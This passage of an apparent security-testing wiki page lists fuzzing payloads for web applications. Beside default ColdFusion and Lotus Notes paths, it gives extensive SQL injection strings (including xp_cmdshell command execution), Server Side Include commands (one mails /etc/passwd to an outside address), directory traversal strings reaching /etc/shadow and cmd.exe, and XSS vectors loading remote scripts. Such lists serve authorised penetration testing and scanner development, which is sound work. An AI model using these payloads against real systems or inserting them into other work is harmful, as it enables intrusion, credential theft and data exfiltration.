.shs<br />
.skc<br />
.slk<br />
.sonic<br />
.soundpack<br />
.spo<br />
.sql<br />
.stf<br />
.stl<br />
.stm<br />
.sy3<br />
.t08<br />
.t09<br />
.t2<br />
.tax2009<br />
.tdl<br />
.tdt<br />
.te<br />
.teacher<br />
.tmw<br />
.tol<br />
.trk<br />
.trs<br />
.trx<br />
.tsv<br />
.uccapilog<br />
.ud<br />
.udeb<br />
.uds<br />
.update<br />
.uwl<br />
.val<br />
.vcf<br />
.vdb<br />
.vfs<br />
.vip<br />
.vle<br />
.vlg<br />
.vxml<br />
.w02<br />
.wab<br />
.wb1<br />
.wb3<br />
.wdq<br />
.wfd<br />
.wfm<br />
.windowslivecontact<br />
.wk1<br />
.wk2<br />
.wk3<br />
.wk4<br />
.wk5<br />
.wke<br />
.wks<br />
.wlmp<br />
.wpc<br />
.wpo<br />
.wq1<br />
.wq2<br />
.wtr<br />
.xbk<br />
.xdb<br />
.xds<br />
.xfd<br />
.xl<br />
.xlgc<br />
.xlr<br />
.xls<br />
.xlsx<br />
.xltm<br />
.xltx<br />
.xml<br />
.xmpz<br />
.xsl<br />
.xsn<br />
.xtm<br />
.xtp<br />
.xxd<br />
.{pb<br />
.~hm<br />
</pre><br />
<br />
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===<br />
<pre><br />
# Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
CFIDE/Administrator/<br />
CFIDE/Administrator/index.cfm<br />
CFIDE/Administrator/login.cfm<br />
CFIDE/Administrator/Application.cfm<br />
CFIDE/Application.cfm<br />
CFIDE/adminapi/<br />
CFIDE/adminapi/Application.cfm<br />
CFIDE/adminapi/administrator.cfc<br />
CFIDE/adminapi/base.cfc<br />
CFIDE/adminapi/customtags/<br />
CFIDE/adminapi/customtags/l10n.cfm<br />
CFIDE/adminapi/customtags/resources<br />
CFIDE/adminapi/customtags/resources/<br />
CFIDE/adminapi/datasource.cfc<br />
CFIDE/adminapi/debugging.cfc<br />
CFIDE/adminapi/eventgateway.cfc<br />
CFIDE/adminapi/extensions.cfc<br />
CFIDE/adminapi/mail.cfc<br />
CFIDE/adminapi/runtime.cfc<br />
CFIDE/adminapi/security.cfc<br />
CFIDE/adminapi/_datasource/<br />
CFIDE/adminapi/_datasource/formatjdbcurl.cfm<br />
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm<br />
CFIDE/adminapi/_datasource/geturldefaults.cfm<br />
CFIDE/adminapi/_datasource/setdsn.cfm<br />
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm<br />
CFIDE/adminapi/_datasource/setsldatasource.cfm<br />
CFIDE/classes/<br />
CFIDE/classes/cf-j2re-win.cab<br />
CFIDE/classes/cfapplets.jar<br />
CFIDE/classes/images<br />
CFIDE/componentutils/<br />
CFIDE/componentutils/Application.cfm<br />
CFIDE/componentutils/cfcexplorer.cfc<br />
CFIDE/componentutils/cfcexplorer_utils.cfm<br />
CFIDE/componentutils/componentdetail.cfm<br />
CFIDE/componentutils/componentdoc.cfm<br />
CFIDE/componentutils/componentlist.cfm<br />
CFIDE/componentutils/gatewaymenu<br />
CFIDE/componentutils/gatewaymenu/<br />
CFIDE/componentutils/gatewaymenu/menu.cfc<br />
CFIDE/componentutils/gatewaymenu/menunode.cfc<br />
CFIDE/componentutils/login.cfm<br />
CFIDE/componentutils/packagelist.cfm<br />
CFIDE/componentutils/utils.cfc<br />
CFIDE/componentutils/_component_cfcToHTML.cfm<br />
CFIDE/componentutils/_component_cfcToMCDL.cfm?<br />
CFIDE/componentutils/_component_style.cfm<br />
CFIDE/componentutils/_component_utils.cfm<br />
CFIDE/debug/<br />
CFIDE/debug/images/<br />
CFIDE/debug/includes/<br />
CFIDE/images/<br />
CFIDE/images/skins/<br />
CFIDE/install.cfm<br />
CFIDE/installers/<br />
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp<br />
CFIDE/installers/CFReportBuilderInstaller.exe<br />
CFIDE/probe.cfm<br />
CFIDE/scripts/<br />
CFIDE/scripts/css/<br />
CFIDE/scripts/xsl/<br />
CFIDE/wizards/<br />
CFIDE/wizards/common/<br />
CFIDE/wizards/common/utils.cfc</pre><br />
<br />
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31) ===<br />
<pre><br />
# ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
OPTIONS<br />
GET<br />
HEAD<br />
POST<br />
PUT<br />
DELETE<br />
TRACE<br />
CONNECT<br />
PROPFIND<br />
PROPPATCH<br />
MKCOL<br />
COPY<br />
MOVE<br />
LOCK<br />
UNLOCK<br />
VERSION-CONTROL<br />
REPORT<br />
CHECKOUT<br />
CHECKIN<br />
UNCHECKOUT<br />
MKWORKSPACE<br />
UPDATE<br />
LABEL<br />
MERGE<br />
BASELINE-CONTROL<br />
MKACTIVITY<br />
ORDERPATCH<br />
ACL<br />
PATCH<br />
SEARCH<br />
ARBITRARY<br />
</pre><br />
<br />
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111) ===<br />
<pre>/852566C90012664F<br />
/admin4.nsf<br />
/admin5.nsf<br />
/admin.nsf<br />
/agentrunner.nsf<br />
/alog.nsf<br />
/a_domlog.nsf<br />
/bookmark.nsf<br />
/busytime.nsf<br />
/catalog.nsf<br />
/certa.nsf<br />
/certlog.nsf<br />
/certsrv.nsf<br />
/chatlog.nsf<br />
/clbusy.nsf<br />
/cldbdir.nsf<br />
/clusta4.nsf<br />
/collect4.nsf<br />
/da.nsf<br />
/dba4.nsf<br />
/dclf.nsf<br />
/DEASAppDesign.nsf<br />
/DEASLog01.nsf<br />
/DEASLog02.nsf<br />
/DEASLog03.nsf<br />
/DEASLog04.nsf<br />
/DEASLog05.nsf<br />
/DEASLog.nsf<br />
/decsadm.nsf<br />
/decslog.nsf<br />
/DEESAdmin.nsf<br />
/dirassist.nsf<br />
/doladmin.nsf<br />
/domadmin.nsf<br />
/domcfg.nsf<br />
/domguide.nsf<br />
/domlog.nsf<br />
/dspug.nsf<br />
/events4.nsf<br />
/events5.nsf<br />
/events.nsf<br />
/event.nsf<br />
/homepage.nsf<br />
/iNotes/Forms5.nsf/$DefaultNav<br />
/jotter.nsf<br />
/leiadm.nsf<br />
/leilog.nsf<br />
/leivlt.nsf<br />
/log4a.nsf<br />
/log.nsf<br />
/l_domlog.nsf<br />
/mab.nsf<br />
/mail10.box<br />
/mail1.box<br />
/mail2.box<br />
/mail3.box<br />
/mail4.box<br />
/mail5.box<br />
/mail6.box<br />
/mail7.box<br />
/mail8.box<br />
/mail9.box<br />
/mail.box<br />
/msdwda.nsf<br />
/mtatbls.nsf<br />
/mtstore.nsf<br />
/names.nsf<br />
/nntppost.nsf<br />
/nntp/nd000001.nsf<br />
/nntp/nd000002.nsf<br />
/nntp/nd000003.nsf<br />
/ntsync45.nsf<br />
/perweb.nsf<br />
/qpadmin.nsf<br />
/quickplace/quickplace/main.nsf<br />
/reports.nsf<br />
/sample/siregw46.nsf<br />
/schema50.nsf<br />
/setupweb.nsf<br />
/setup.nsf<br />
/smbcfg.nsf<br />
/smconf.nsf<br />
/smency.nsf<br />
/smhelp.nsf<br />
/smmsg.nsf<br />
/smquar.nsf<br />
/smsolar.nsf<br />
/smtime.nsf<br />
/smtpibwq.nsf<br />
/smtpobwq.nsf<br />
/smtp.box<br />
/smtp.nsf<br />
/smvlog.nsf<br />
/srvnam.htm<br />
/statmail.nsf<br />
/statrep.nsf<br />
/stauths.nsf<br />
/stautht.nsf<br />
/stconfig.nsf<br />
/stconf.nsf<br />
/stdnaset.nsf<br />
/stdomino.nsf<br />
/stlog.nsf<br />
/streg.nsf<br />
/stsrc.nsf<br />
/userreg.nsf<br />
/vpuserinfo.nsf<br />
/webadmin.nsf<br />
/web.nsf<br />
/.nsf/../winnt/win.ini<br />
/?Open <br />
</pre><br />
<br />
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126) ===<br />
<pre>Statement<br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
"a"" or 1=1--"<br />
or a = a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q =<br />
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A<br />
0<br />
031003000270000<br />
declare @s varchar(22) select @s =<br />
0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e<br />
exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
'<br />
'%20or%20''='<br />
'%20or%20'x'='x<br />
%20or%20x=x<br />
')%20or%20('x'='x<br />
0 or 1=1<br />
' or 0=0 --<br />
" or 0=0 --<br />
or 0=0 --<br />
' or 0=0 #<br />
or 0=0 #"<br />
or 0=0 #<br />
' or 1=1--<br />
" or 1=1--<br />
' or '1'='1'--<br />
' or 1 --'<br />
or 1=1--<br />
or%201=1<br />
or%201=1 --<br />
' or 1=1 or ''='<br />
or 1=1 or ""=<br />
' or a=a--<br />
or a=a<br />
') or ('a'='a<br />
) or (a=a<br />
hi or a=a<br />
hi or 1=1 --"<br />
hi' or 1=1 --<br />
hi' or 'a'='a<br />
hi') or ('a'='a<br />
"hi"") or (""a""=""a"<br />
'hi' or 'x'='x';<br />
@variable<br />
,@variable<br />
PRINT<br />
PRINT @@variable<br />
select<br />
insert<br />
as<br />
or<br />
procedure<br />
limit<br />
order by<br />
asc<br />
desc<br />
delete<br />
update<br />
distinct<br />
having<br />
truncate<br />
replace<br />
like<br />
handler<br />
bfilename<br />
' or username like '%<br />
' or uname like '%<br />
' or userid like '%<br />
' or uid like '%<br />
' or user like '%<br />
exec xp<br />
exec sp<br />
'; exec master..xp_cmdshell<br />
'; exec xp_regread<br />
t'exec master..xp_cmdshell 'nslookup www.google.com'--<br />
--sp_password<br />
\x27UNION SELECT<br />
' UNION SELECT<br />
' UNION ALL SELECT<br />
' or (EXISTS)<br />
' (select top 1<br />
'||UTL_HTTP.REQUEST<br />
1;SELECT%20*<br />
to_timestamp_tz<br />
tz_offset<br />
&lt;&gt;"'%;)(&amp;+<br />
'%20or%201=1<br />
%27%20or%201=1<br />
%20$(sleep%2050)<br />
%20'sleep%2050'<br />
char%4039%41%2b%40SELECT<br />
&amp;apos;%20OR<br />
'sqlattempt1<br />
(sqlattempt2)<br />
|<br />
%7C<br />
*|<br />
%2A%7C<br />
*(|(mail=*))<br />
%2A%28%7C%28mail%3D%2A%29%29<br />
*(|(objectclass=*))<br />
%2A%28%7C%28objectclass%3D%2A%29%29<br />
(<br />
%28<br />
)<br />
%29<br />
&amp;<br />
%26<br />
!<br />
%21<br />
' or 1=1 or ''='<br />
' or ''='<br />
x' or 1=1 or 'x'='y<br />
/<br />
//<br />
//*<br />
*/*<br />
a' or 3=3--<br />
"a"" or 3=3--"<br />
' or 3=3<br />
‘ or 3=3 --<br />
</pre> <br />
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4) ===<br />
<pre>&lt;!--#exec cmd="/bin/ls /" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="cat /etc/passwd" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="find / -name *.* -print" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="mail Foobar@email.de &lt;mailto:Foobar@email.de&gt; &lt; cat /etc/passwd" --&gt;&lt;br/&gt;<br />
</pre> <br />
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132) ===<br />
<pre>Statement<br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
../../../../../../../../../../../../etc/hosts%00<br />
../../../../../../../../../../../../etc/hosts<br />
../../boot.ini<br />
/../../../../../../../../%2A<br />
../../../../../../../../../../../../etc/passwd%00<br />
../../../../../../../../../../../../etc/passwd<br />
../../../../../../../../../../../../etc/shadow%00<br />
../../../../../../../../../../../../etc/shadow<br />
/../../../../../../../../../../etc/passwd^^<br />
/../../../../../../../../../../etc/shadow^^<br />
/../../../../../../../../../../etc/passwd<br />
/../../../../../../../../../../etc/shadow<br />
/./././././././././././etc/passwd<br />
/./././././././././././etc/shadow<br />
\..\..\..\..\..\..\..\..\..\..\etc\passwd<br />
\..\..\..\..\..\..\..\..\..\..\etc\shadow<br />
..\..\..\..\..\..\..\..\..\..\etc\passwd<br />
..\..\..\..\..\..\..\..\..\..\etc\shadow<br />
/..\../..\../..\../..\../..\../..\../etc/passwd<br />
/..\../..\../..\../..\../..\../..\../etc/shadow<br />
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd<br />
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow<br />
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00<br />
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00<br />
..\..\..\..\..\..\..\..\..\..\etc\passwd%00<br />
..\..\..\..\..\..\..\..\..\..\etc\shadow%00<br />
%0a/bin/cat%20/etc/passwd<br />
%0a/bin/cat%20/etc/shadow<br />
%00/etc/passwd%00<br />
%00/etc/shadow%00<br />
%00../../../../../../etc/passwd<br />
%00../../../../../../etc/shadow<br />
/../../../../../../../../../../../etc/passwd%00.jpg<br />
/../../../../../../../../../../../etc/passwd%00.html<br />
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd<br />
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow<br />
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00<br />
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00<br />
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%<br />
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini<br />
\\&amp;apos;/bin/cat%20/etc/passwd\\&amp;apos;<br />
\\&amp;apos;/bin/cat%20/etc/shadow\\&amp;apos;<br />
../../../../../../../../conf/server.xml<br />
/../../../../../../../../bin/id|<br />
C:/inetpub/wwwroot/global.asa<br />
C:\inetpub\wwwroot\global.asa<br />
C:/boot.ini<br />
C:\boot.ini<br />
../../../../../../../../../../../../localstart.asp%00<br />
../../../../../../../../../../../../localstart.asp<br />
../../../../../../../../../../../../boot.ini%00<br />
../../../../../../../../../../../../boot.ini<br />
/./././././././././././boot.ini<br />
/../../../../../../../../../../../boot.ini%00<br />
/../../../../../../../../../../../boot.ini<br />
/..\../..\../..\../..\../..\../..\../boot.ini<br />
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini<br />
\..\..\..\..\..\..\..\..\..\..\boot.ini<br />
..\..\..\..\..\..\..\..\..\..\boot.ini%00<br />
..\..\..\..\..\..\..\..\..\..\boot.ini<br />
/../../../../../../../../../../../boot.ini%00.html<br />
/../../../../../../../../../../../boot.ini%00.jpg<br />
/.../.../.../.../.../<br />
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini<br />
</pre> <br />
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".'' <br />
<br />
=== XSS Discovery Statements ===<br />
<br />
Discovery Statements<br />
<pre># Discovery Statements (July 2007)<br />
# Statements used to cause exploitable errors<br />
# Foobar@email.de<br />
<br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt; <br />
'';!--"&lt;XSS&gt;=&amp;{()}<br />
</pre> <br />
<br />
Common exploit code <br />
<pre># Best Statements (July 2007)<br />
# Statements covering 90% of all vulnerabilities <br />
# Foobar@email.de<br />
<br />
'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt='<br />
"&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt="<br />
\'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt=\'<br />
'); alert('xss'); var x='<br />
\\'); alert(\'xss\');var x=\'<br />
//--&gt;&lt;/SCRIPT&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83));<br />
</pre><br />
<br />
Full List - (Update: 11 August 2009 - Total Statements: 162) <br />
<pre># Full List (July 2007)<br />
# All Statements - Full List <br />
# Based on the XSS cheat sheet <br />
# http://ha.ckers.org/xss.html<br />
# Foobar@email.de<br />
<br />
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;<br />
"&lt;IMG SRC=""javascript:alert('XSS');""&gt;"<br />
&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;<br />
"&lt;IMG SRC=javascript:alert(""XSS"")&gt;"<br />
"&lt;IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`&gt;"<br />
"&lt;IMG """"""&gt;&lt;SCRIPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;"<br />
&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;<br />
&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;<br />
&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br />
"&lt;IMG SRC=""jav"<br />
"ascript:alert('XSS');""&gt;"<br />
"perl -e 'print ""&lt;IMG SRC=java\0script:alert(\""XSS\"")&gt;"";' &gt; out"<br />
"perl -e 'print ""&lt;SCR\0IPT&gt;alert(\""XSS\"")&lt;/SCR\0IPT&gt;"";' &gt; out"<br />
"&lt;IMG SRC="" &amp;#14; javascript:alert('XSS');""&gt;"<br />
"&lt;SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(""XSS"")&gt;"<br />
"&lt;SCRIPT/SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;&lt;SCRIPT&gt;alert(""XSS"");//&lt;&lt;/SCRIPT&gt;"<br />
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt;B&gt;<br />
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;<br />
"&lt;IMG SRC=""javascript:alert('XSS')"""<br />
&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;<br />
&lt;SCRIPT&gt;a=/XSS/\nalert(a.source)&lt;/SCRIPT&gt;<br />
"\"";alert('XSS');//"<br />
"&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(""XSS"");&lt;/SCRIPT&gt;"<br />
"&lt;INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');""&gt;"<br />
"&lt;BODY BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
&lt;BODY ONLOAD=alert('XSS')&gt;<br />
"&lt;IMG DYNSRC=""javascript:alert('XSS')""&gt;"<br />
"&lt;IMG LOWSRC=""javascript:alert('XSS')""&gt;"<br />
"&lt;BGSOUND SRC=""javascript:alert('XSS');""&gt;"<br />
"&lt;BR SIZE=""&amp;{alert('XSS')}""&gt;"<br />
"&lt;LAYER SRC=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/LAYER&gt;"<br />
